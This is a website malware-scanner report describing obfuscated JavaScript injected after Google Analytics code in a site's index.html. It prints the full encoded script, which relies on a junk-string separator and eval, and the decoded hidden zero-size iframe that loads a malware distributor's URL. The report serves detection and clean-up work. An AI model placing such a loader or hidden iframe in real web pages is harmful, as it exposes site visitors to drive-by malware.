Threat Code Mixed With Google Analytics Redirects Visitors To Malware Distributor

Obfuscated malicious JavaScript code combined with GA code

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Obfuscated JavaScript comes right after the valid GA code and placed in index.html. 

One might assume that the GA code was embedded by attacker as well to monitor his success. However, this might be a simple coincidence. Interestingly, the website is in Google blacklist database. Below you will find payload analysis and threat dump. 

For public databases of site scan reports:

Clean domains

Potentially Suspicious domains

Suspicious domains

Malicious domains

For global web malware monitoring statistic and severity levels:

Last day

Last week

Last month

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Thu Nov 28 14:18:42 2013

Infected website's files: 1

Website malware scan report link: http://goo.gl/S4oz7N

Online Website Malware Scanner sitescan overview

Malware entry

Beautified script

<script>varwsqWQBPps="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";yvDFQwwmM=eval;varWSxQJgvuB=wsqWQBPps.replace(/cNRoPJdqz/g,"%");]]

Malicious payload

Decoded payload generates hidden iframe to http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854

Payload:
<iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>

Blacklisting status

The website is Suspicious on Google Safe Browsing.

VirusTotal URL scan reports 8/51 antivirus and malware detection engines identified the redirect IP as malicious site.

VirusTotal URL scan report screenshot

Malware clean-up

Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.